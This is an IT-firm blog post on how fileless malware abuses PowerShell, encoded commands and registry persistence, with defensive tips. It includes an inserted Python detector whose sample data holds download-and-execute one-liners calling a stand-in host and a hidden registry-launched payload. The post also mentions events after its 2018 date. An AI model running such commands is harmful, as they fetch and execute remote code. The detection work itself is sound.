
Fileless Malware: How It Works and How To Avoid It

Network Security
August 6, 2018
Beth Stewart

Fileless malware can quickly gain full access to network, computer and even browser activity (including login credentials) without the victim knowing.

The Rise of Fileless Malware

Many of the early infectious programs that we now know as malware were written as experiments or pranks. With the spread of broadband internet, they were increasingly designed for profit. Since the late 1990s, many widespread viruses, trojans and worms have been built to take control of end users' computers and steal business, personal and financial information. In recent years these infections have evolved into ransomware, spyware, click fraud and distributed denial-of-service attacks used for profit and sabotage.

Malware is traditionally spread by copying an executable program onto the victim's computer. The executable is usually disguised inside an infected attachment such as a Word document, PDF or JPEG, but can also arrive on external media, on mobile phones or through browser "drive-by" attacks. Once executed, the malware's instructions are loaded into the machine's memory, where it can download additional malware or "phone home" to the people controlling it. Installation is normally handled by a separate dropper that writes one or more files to the hard disk. It is that on-disk footprint that leaves infection "residue" on the host even when the malware tries to avoid detection, and it is what file-based antivirus is built to find.

The Difference Between Malware and Fileless Malware

Fileless malware came to wide attention in 2017, although the technique itself is older. Evolving from successful malware techniques, fileless malware aims never to have its own content written to the infected computer's hard drive as an executable file.

Fileless malware does not involve a second program dropped by an installer. Instead, it loads directly into memory as commands to tools that are already part of the operating system, runs immediately and causes trusted programs installed on the machine to perform the malicious work. The in-memory component is lost when the host device is powered down completely, which is why fileless attacks that need to survive a reboot fall back on the registry, scheduled tasks or WMI, as described below. One of the most common delivery methods is through webpages and script attachments. Since HTML, the formatting language used to create websites, has no programming capabilities, scripting languages such as JavaScript were developed to add program logic to webpages.

In a typical chain, a malicious script (JavaScript, or its Windows cousin JScript, run by Windows Script Host from an e-mail attachment, launched by a browser or plug-in exploit, or started from an Office macro) calls Windows PowerShell and hands it a series of commands, often packed into a single base64-encoded argument. Each command executes in the machine's memory. The script starts PowerShell with a hidden window and exits as soon as the commands have run, leaving no visible sign that a script was executed. Although the web page's code sits on disk briefly in the browser cache while the page loads, it is not an executable and is soon overwritten, so little of the delivery mechanism survives for later analysis.

The code for fileless malware is not installed on the victim's machine as a program. When it needs persistence, it writes its script into the Windows Registry, typically as an autostart (Run) entry, a scheduled task or a WMI event subscription that launches PowerShell with a short command which pulls the real script out of another registry value. Although the registry hives themselves live on disk, no executable file is ever created, so the attack is very resistant to security controls built around files (file-based whitelisting, signature detection, pattern analysis, time-stamping and so on), and it leaves very little evidence that digital forensic investigators could use to reconstruct fraudulent activity following a data breach or security incident.
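As an added example (this is not code from the article or from Pivotal IT), the following Python script shows what the chain described above looks like from the defender's side. It takes process-creation records (parent, image and command line, the fields a Sysmon Event ID 1 or Security event 4688 record supplies) and the values of a Run key, decodes any -EncodedCommand argument back to clear text the same way PowerShell would (base64 over UTF-16LE), and scores the result against a small set of indicators. The log records, the registry values, the host name example.invalid, the indicator list and its weights are all constructed for this demonstration; a real deployment would use a maintained rule set.

```python
"""Flag fileless PowerShell launches in process-creation records and in
Windows Run-key values.

Added example, not code from the article or from Pivotal IT.  The log
records, registry values, host name (example.invalid) and indicator
weights below are constructed for this demonstration."""
import base64
import re
from typing import Optional

# Indicator name -> (pattern matched against the lower-cased command line,
# weight).  The list and the weights are this example's own choices.
INDICATORS = {
    "no-profile":        (r"-nop(?:rofile)?\b", 1),
    "hidden-window":     (r"-w(?:indowstyle)?\s+hidden", 2),
    "policy-bypass":     (r"-e(?:p|xecutionpolicy)\s+bypass", 1),
    "invoke-expression": (r"\biex\b|invoke-expression", 2),
    "web-download":      (r"downloadstring|downloadfile|net\.webclient|invoke-webrequest", 2),
    "base64-decode":     (r"frombase64string", 1),
    "registry-payload":  (r"get-itemproperty|hkcu:|hklm:", 2),
}
ENCODED_WEIGHT = 2      # a -EncodedCommand blob is an indicator in itself
PARENT_WEIGHT = 2       # script host spawned by Office or by another script host
ALERT_THRESHOLD = 4
# powershell.exe accepts any unambiguous prefix of -EncodedCommand; the
# common spellings are -e, -ec, -enc and the full name.
ENCODED_RE = re.compile(r"-e(?:c|nc|ncodedcommand)?\s+([A-Za-z0-9+/=]{20,})", re.IGNORECASE)
SCRIPT_HOSTS = ("powershell.exe", "pwsh.exe", "wscript.exe", "cscript.exe", "mshta.exe")
OFFICE_APPS = ("winword.exe", "excel.exe", "powerpnt.exe", "outlook.exe")


def encode_command(script: str) -> str:
    """Build the argument powershell.exe expects after -EncodedCommand:
    base64 over the UTF-16LE bytes of the script.  Used here only to
    construct realistic sample data."""
    return base64.b64encode(script.encode("utf-16le")).decode("ascii")


def decode_encoded_command(cmdline: str) -> Optional[str]:
    """Recover the clear-text script hidden behind -EncodedCommand, or None."""
    m = ENCODED_RE.search(cmdline)
    if m is None:
        return None
    try:
        return base64.b64decode(m.group(1), validate=True).decode("utf-16le")
    except (ValueError, UnicodeDecodeError):   # binascii.Error is a ValueError
        return None


def score_command_line(cmdline: str):
    """Return (score, hit_names) for one command line.  An encoded blob is
    removed from the text before pattern matching (random letter runs in
    base64 must not trigger word patterns) and its decoded form is scanned
    instead, so encoding does not lower the score."""
    text = cmdline.lower()
    hits, score = [], 0
    m = ENCODED_RE.search(cmdline)
    if m is not None:
        hits.append("encoded-command")
        score += ENCODED_WEIGHT
        text = text.replace(m.group(1).lower(), " ")
        decoded = decode_encoded_command(cmdline)
        if decoded is not None:
            text += "\n" + decoded.lower()
    for name, (pattern, weight) in INDICATORS.items():
        if re.search(pattern, text):
            hits.append(name)
            score += weight
    return score, hits


def analyze_process_events(events):
    """events: dicts with 'parent', 'image' and 'cmdline'.  Returns one alert
    per script-host launch whose score reaches ALERT_THRESHOLD."""
    alerts = []
    for ev in events:
        if not ev["image"].lower().endswith(SCRIPT_HOSTS):
            continue
        score, hits = score_command_line(ev["cmdline"])
        parent = ev["parent"].lower()
        if parent.endswith(OFFICE_APPS) or parent.endswith(SCRIPT_HOSTS):
            hits.append("suspicious-parent")
            score += PARENT_WEIGHT
        if score >= ALERT_THRESHOLD:
            alerts.append({"image": ev["image"], "parent": ev["parent"], "score": score,
                           "hits": hits, "decoded": decode_encoded_command(ev["cmdline"])})
    return alerts


def analyze_run_key(values):
    """values: {name: data} exported from a Run key.  Legitimate entries point
    at an executable; a fileless implant's entry starts a script host whose
    one-liner pulls the real script out of another registry value."""
    alerts = []
    for name, data in values.items():
        if not any(host in data.lower() for host in SCRIPT_HOSTS):
            continue
        score, hits = score_command_line(data)
        if score >= ALERT_THRESHOLD:
            alerts.append({"value": name, "score": score, "hits": hits})
    return alerts


# --- constructed sample data, not from a real incident ----------------------
STAGE2 = "IEX (New-Object Net.WebClient).DownloadString('http://example.invalid/s2')"
PS_EXE = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
SAMPLE_EVENTS = [
    # an administrator's interactive use: one weak indicator, no alert
    {"parent": r"C:\Windows\explorer.exe", "image": PS_EXE,
     "cmdline": "powershell.exe -NoProfile -Command Get-Process"},
    # Word macro starting a hidden, encoded downloader (the chain in the article)
    {"parent": r"C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE", "image": PS_EXE,
     "cmdline": "powershell.exe -NoProfile -WindowStyle Hidden -EncodedCommand " + encode_command(STAGE2)},
    # JScript attachment run by Windows Script Host, which then starts PowerShell
    {"parent": r"C:\Windows\System32\wscript.exe", "image": PS_EXE,
     "cmdline": 'powershell.exe -ExecutionPolicy Bypass -w hidden -c "IEX (Invoke-WebRequest http://example.invalid/s2).Content"'},
]
SAMPLE_RUN_KEY = {
    "OneDrive": r'"C:\Users\alice\AppData\Local\Microsoft\OneDrive\OneDrive.exe" /background',
    "WinUpdate": r'powershell.exe -nop -w hidden -c "IEX (Get-ItemProperty HKCU:\Software\Classes\x).p"',
}

if __name__ == "__main__":
    for a in analyze_process_events(SAMPLE_EVENTS):
        print(f"[{a['score']}] {a['parent']} -> {a['image']}: {', '.join(a['hits'])}")
        if a["decoded"]:
            print("    decoded:", a["decoded"])
    for a in analyze_run_key(SAMPLE_RUN_KEY):
        print(f"[{a['score']}] Run\\{a['value']}: {', '.join(a['hits'])}")
```

Running the file prints two process alerts (the Word-spawned encoded launch and the wscript-spawned one) and one Run-key alert, while the administrator's plain Get-Process launch stays below the threshold. The same score_command_line routine can be pointed at the ScriptBlockText of PowerShell Event ID 4104 records, which hold the script as it actually executed even when the launch line was encoded.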

Much of the response to fileless attacks has come from Microsoft rather than from the wider anti-malware industry. Because these attacks abuse Windows' own tools, Microsoft added PowerShell script block logging and the Antimalware Scan Interface (AMSI), which hands script content to the installed antivirus at the moment it is about to run, even if it was decoded in memory; Windows Defender and Office 365 build on these to flag irregular PowerShell and Windows Management Instrumentation (WMI) activity.

Avoiding Fileless Malware Attacks

Defense against any type of malware begins with keeping your software up to date. Recent Windows and PowerShell versions add controls that make abuse of PowerShell and WMI much harder to hide (script block logging, AMSI and Constrained Language Mode), so ensuring Windows machines are up to date should be a priority.

Stop PDFs from opening inside the browser, and disable JavaScript in your PDF reader. The malicious code of an in-browser PDF attack leaves no trace once the viewing tab is closed. If a PDF is downloaded before it is opened, endpoint anti-malware (and any gateway that scans downloads) has a chance to inspect it, and the file remains available for analysis later.

Although JavaScript is a channel for fileless malware, disabling it in the browser is not recommended. Not only will webpages you visit be missing elements or blank, but the interpreter that matters most here is not the browser's: Windows Script Host ships its own JScript engine, which runs a .js attachment (for example one disguised as an invoice) whether or not JavaScript is turned off in the browser. Blocking .js, .jse, .vbs and .hta attachments at the mail gateway, or re-associating those extensions with Notepad, does more good than disabling browser JavaScript.

Microsoft Office has macros turned off by default, but it is still important to remind employees not to enable macros in attachments. Macros are in fact one of the main launch points for fileless attacks: a few lines of VBA can start PowerShell or WMI with an encoded command while the document itself looks like an ordinary file. Leaving attachments in Protected View, and using Office's option to block macros in files that came from the Internet, removes that opportunity.

Disable Flash for video viewing. On most websites Flash has been replaced with HTML5 (and Adobe ended support for Flash at the end of 2020). Chrome and Firefox both provide the option to block Flash. In Internet Explorer, disabling ActiveX prevents Flash from loading. Microsoft Edge blocks Flash content unless the user explicitly allows it.


Unauthorized use and/or duplication of this material without express and written permission from Pivotal IT is strictly prohibited. Excerpts and links may be used, provided that full and clear credit is given to Pivotal IT with appropriate and specific direction to the original content
